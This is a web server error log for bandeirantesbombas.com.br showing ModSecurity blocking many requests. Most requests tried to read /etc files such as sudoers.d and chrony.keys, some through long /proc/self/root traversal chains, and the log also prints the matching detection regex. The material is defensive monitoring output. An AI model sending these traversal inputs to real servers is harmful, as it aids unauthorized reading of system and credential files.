[Fri Mar 20 11:13:53.519060 2026] [:error] [pid 11167:tid 140411683178240] [client 74.7.241.31:46772] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1WIPHIg5MgXLBnicMgAAAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:13:56.631906 2026] [:error] [pid 7893:tid 140411599251200] [client 216.73.216.191:54838] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/asound.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1WJBCii7xarUs8iHaUxQAAAhE"]
[Fri Mar 20 11:13:58.495768 2026] [:error] [pid 21219:tid 140411590858496] [client 216.73.216.191:54898] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1WJfXLqtnMIWvjpaLFtQAAApI"]
[Fri Mar 20 11:14:00.057924 2026] [:error] [pid 26799:tid 140411565680384] [client 216.73.216.191:54910] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1WJda6ubjKNq_cu4YEUgAAA1U"]
[Fri Mar 20 11:14:01.600109 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:34658] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1WKda6ubjKNq_cu4YEWgAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:14:02.635247 2026] [:error] [pid 7893:tid 140411616036608] [client 216.73.216.191:55144] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1WKhCii7xarUs8iHaUyQAAAg8"]
[Fri Mar 20 11:14:03.131366 2026] [:error] [pid 10189:tid 140411674785536] [client 216.73.216.191:55178] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1WKzJ3M9BSuKP7CAZP2AAAAIg"]
[Fri Mar 20 11:14:06.977899 2026] [mime_magic:error] [pid 11167:tid 140411641214720] (70014)End of file found: [client 216.73.216.191:55420] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:14:10.687052 2026] [:error] [pid 9818:tid 140411632822016] [client 57.141.18.116:55632] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1WMl1pVZ5mVmJwsFNZOQAAAE0"]
[Fri Mar 20 11:14:11.487484 2026] [:error] [pid 21219:tid 140411683178240] [client 74.7.241.31:43056] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1WM_XLqtnMIWvjpaLFywAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:14:12.083550 2026] [:error] [pid 15826:tid 140411725141760] [client 57.141.18.118:55712] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1WNOoXxyEfFpUF8f-qiQAAAUI"]
[Fri Mar 20 11:14:18.979118 2026] [:error] [pid 21219:tid 140411708356352] [client 57.141.18.36:55858] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1WOvXLqtnMIWvjpaLF1AAAAoQ"]
[Fri Mar 20 11:14:20.602086 2026] [:error] [pid 10189:tid 140411582465792] [client 57.141.18.18:56192] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1WPDJ3M9BSuKP7CAZP7wAAAJM"]
[Fri Mar 20 11:14:20.956397 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:48732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1WPNa6ubjKNq_cu4YEdAAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:14:24.094652 2026] [:error] [pid 21219:tid 140411641214720] [client 74.7.228.61:37698] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1WPfXLqtnMIWvjpaLF2wAAAow"]
[Fri Mar 20 11:14:35.727953 2026] [mime_magic:error] [pid 10189:tid 140411725141760] (70014)End of file found: [client 57.141.18.2:57186] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:14:36.132565 2026] [:error] [pid 9818:tid 140411590858496] [client 74.7.243.128:58808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1WTF1pVZ5mVmJwsFNZWgAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:14:36.363223 2026] [:error] [pid 7235:tid 140411674785536] [client 74.7.241.31:51122] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1WTPqxLDW4GITHUkQUggAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:14:40.911466 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.241.31:38504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1WTvXLqtnMIWvjpaLF9AAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:14:41.453472 2026] [mime_magic:error] [pid 26799:tid 140411725141760] (70014)End of file found: [client 57.141.18.74:57494] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:14:42.303408 2026] [:error] [pid 15826:tid 140411733534464] [client 216.73.216.191:57542] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1WUuoXxyEfFpUF8f-qoQAAAUE"]
[Fri Mar 20 11:14:43.407423 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:43972] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1WU9a6ubjKNq_cu4YEkAAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:14:44.995569 2026] [:error] [pid 9818:tid 140411624429312] [client 216.73.216.191:57732] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1WVF1pVZ5mVmJwsFNZagAAAE4"]
[Fri Mar 20 11:14:51.251625 2026] [:error] [pid 26799:tid 140411649607424] [client 216.73.216.191:58032] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1WW9a6ubjKNq_cu4YElwAAA0s"]
[Fri Mar 20 11:14:51.483551 2026] [:error] [pid 26799:tid 140411699963648] [client 57.141.18.114:58128] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1WW9a6ubjKNq_cu4YEmQAAA0U"]
[Fri Mar 20 11:14:52.890087 2026] [:error] [pid 9818:tid 140411616036608] [client 216.73.216.191:58240] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1WXF1pVZ5mVmJwsFNZdgAAAE8"]
[Fri Mar 20 11:14:54.111498 2026] [:error] [pid 9818:tid 140411565680384] [client 216.73.216.191:58316] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1WXl1pVZ5mVmJwsFNZeAAAAFU"]
[Fri Mar 20 11:14:56.623233 2026] [:error] [pid 15826:tid 140411624429312] [client 216.73.216.191:58424] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1WYOoXxyEfFpUF8f-qtQAAAU4"]
[Fri Mar 20 11:15:03.388386 2026] [:error] [pid 11642:tid 140411683178240] [client 216.73.216.191:58764] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1WZbninkcc-iUj5AqHaQAAA4c"]
